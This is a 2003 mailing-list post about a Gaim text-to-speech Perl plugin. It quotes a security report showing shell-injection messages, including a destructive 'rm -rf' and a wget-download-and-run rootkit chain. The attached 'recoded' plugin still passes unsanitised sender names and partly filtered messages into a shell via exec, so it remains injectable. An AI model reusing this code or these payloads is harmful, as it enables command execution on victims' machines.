DUH... would help if I attached my attachment.
I am right proud of myself for this, and it also needs mention to
address the security issue that our friend Error (is that a reference to
Zelda 2?) raised.
Attached, find the latest reissue of the Gaim festival plugin. The guy
that wrote it, wrote it for pre-0.68 Perl API, but it was secure against
the sort of attack that Error described. I have since taken it and
recoded it to work with post-0.68 versions of Gaim. It is attached. By
all means, if you see an exploitable bug in there, let me know! I'm
just a perl-tot..
Cheers,
~Brian
On Wed, 2003-10-15 at 11:29, error wrote:
> It has come to my attention that people have actually used this example
> code for a gaim plugin:
>
> AIM::register("Festival TTS", "0.0.1", "goodbye", "");
> AIM::print("Perl Says", "Loaded Festival TTS");
> AIM::command("idle", "60000") if ($pro ne "Offline");
> AIM::add_event_handler("event_im_recv", "synthesize");
>
> sub goodbye {
> AIM::print("Module Unloaded", "Unloaded Festival TTS");
> }
>
> sub synthesize {
> my $string = $_[0];
> $string =~ s/\<.*?\>//g;
> $string =~ s/\".*\"//;
> system("echo \"$string\" | /usr/bin/festival --tts");
> }
>
> As taken from:
> http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
>
> This has to be one of the most amusing ways to gain a local users
> privileges I have ever seen by an "Expert (TM)"
>
> Exploit code?
> You have a shell through gaim with that.
>
> Just pass it this message (or really any message for that matter):
>
> Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
>
> Or perhaps:
>
> Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
> rootkit;./rootkit
>
> Perhaps someone should ask:
>
> "(Is s/[^\w]//g really that hard to do?!)"
>
> So a fixed version would look like this:
>
> AIM::register("Festival TTS", "0.0.1", "goodbye", "");
> AIM::print("Perl Says", "Loaded Festival TTS");
> AIM::command("idle", "60000") if ($pro ne "Offline");
> AIM::add_event_handler("event_im_recv", "synthesize");
>
> sub goodbye {
> AIM::print("Module Unloaded", "Unloaded Festival TTS");
> }
>
> sub synthesize {
> my $string = $_[0];
> $string =~ s/\<.*?\>//g;
> $string =~ s/\".*\"//;
> $string =~ s/[^\w]//g;
> system("echo \"$string\" | /usr/bin/festival --tts");
> }
>
> Just a minor comment, nothing special.
--
HCTITS Security Division <security@humancentrictech.com>
HumanCentric Technologies
# gabfest.pl
# updated by Brian Henning <brian@cheetah.dynip.com>
# License: GPL
#
# Based upon:
#GAIMFestival.pl
#By: Matt Davis <agent@sdf.lonestar.org>
#Screen Name: dasmittel
#License: GPL
#
#This is a perl plugin written for GAIM version 0.11
#It will make festival read your incoming messages to you
#after stripping out any html tags that the windows clients send
#
#The fork allows the message to be displayed as it is being said. If
#system was used, the message would not display until after festival was
#done saying it.
#
#03/17/01
use Gaim;
%PLUGIN_INFO = (
perl_api_version => 2,
name => "GabFest",
version => "0.5",
summary => "Uses Festival to read incoming instant messages",
description => "There's nothing more to say about this plugin.",
author => "Matt Davis, recoded by Brian Henning",
url => "",
load => "plugin_load",
unload => "plugin_unload"
);
sub plugin_init {
return %PLUGIN_INFO;
}
sub plugin_load {
$plugin = shift;
Gaim::signal_connect(Gaim::Conversations::handle, "received-im-msg", $plugin, \&festival_say, 0);
# Gaim::signal_connect($plugin, Gaim::Conversation, "received-im-msg", \&festival_say);
unless(fork){exec("echo Gabfest has loaded | artsdsp festival -b --tts");}
Gaim::print("Meaningless Drivel", "The damn thing is loaded, not that it does any good.");
}
sub plugin_unload {
$plugin = shift;
Gaim::print("GabFest", "GabFest has unloaded.");
}
sub festival_say {
my ($gc, $sendername, $message, $flags) = @_;
$_ = $message;
s/<(?:[^>\'\"]*|([\'\"]).*?\1)*>//gs; #Parse out most HTML. See note 1.
s/\'//g; #These lines remove characters that cannot be sent to festival
s/\"//g; # via the command line
s/\(//g;
s/\)//g;
s/\>//g;
s/\<//g;
s/\;//g;
$message = $_;
if ($message ne ""){
unless (fork){
exec("echo $sendername said, $message | artsdsp festival -b --tts");}
} else {
system("echo The function was called, but there was apparently nothing to say | artsdsp festival -b --tts");
}
return 0;
}
#--- Note 1. This section was taken from the URL below
#http://www.rocketaware.com/perl/perlfaq9/How_do_I_remove_HTML_from_a_stri.htm
#--- Thanks guys.
